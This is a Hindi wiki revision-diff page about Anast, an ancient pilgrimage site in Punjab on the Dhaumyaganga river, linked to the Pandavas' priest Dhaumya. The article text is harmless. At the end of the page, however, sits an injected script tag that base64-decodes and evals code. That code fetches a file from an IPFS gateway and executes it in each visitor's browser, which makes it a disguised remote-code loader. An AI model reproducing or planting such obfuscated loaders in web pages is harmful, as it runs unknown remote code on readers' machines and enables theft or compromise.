Difference between revisions of "अनास्त"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अनास्त''' पंजाब का एक प्राचीन तीर्थ है जो [[धौम्यगंग...' के साथ नया पन्ना बनाया)
 
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
'''अनास्त''' [[पंजाब]] का एक प्राचीन तीर्थ है जो [[धौम्यगंगा नदी|धौम्यगंगा]] के तट पर स्थित है। इसका आधुनिक नाम जगतसुख है।
+
'''अनास्त''' [[पंजाब]] का एक प्राचीन [[तीर्थ]] है जो [[धौम्यगंगा नदी|धौम्यगंगा]] के तट पर स्थित है। इसका आधुनिक नाम '''जगतसुख''' है। [[पांडव|पांडवों]] के [[पुरोहित]] [[धौम्य ऋषि|धौम्य]] से, जो देश भ्रमण में उनके साथ रहे थे, इस [[ग्राम]] का संबंध बताया जाता है।  
* [[पांडव|पांडवों]] के [[पुरोहित]] धौम्य से, जो देश भ्रमण में उनके साथ रहे थे, इस ग्राम का संबंध बताया जाता है।  
 
  
  
 +
 +
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 20| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
  
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
 
<references/>
 
<references/>
 
+
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{पंजाब के ऐतिहासिक स्थान}}
 
{{पंजाब के ऐतिहासिक स्थान}}
 
[[Category:पंजाब]]
 
[[Category:पंजाब]]
[[Category:पंजाब के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:पंजाब के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]] [[Category:ऐतिहासिक स्थानावली]]
 
__INDEX__
 
__INDEX__

Latest revision as of 10:37, 3 May 2018

anast panjab ka ek prachin tirth hai jo dhaumyaganga ke tat par sthit hai. isaka adhunik nam jagatasukh hai. paandavoan ke purohit dhaumy se, jo desh bhraman mean unake sath rahe the, is gram ka sanbandh bataya jata hai.


tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 20| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>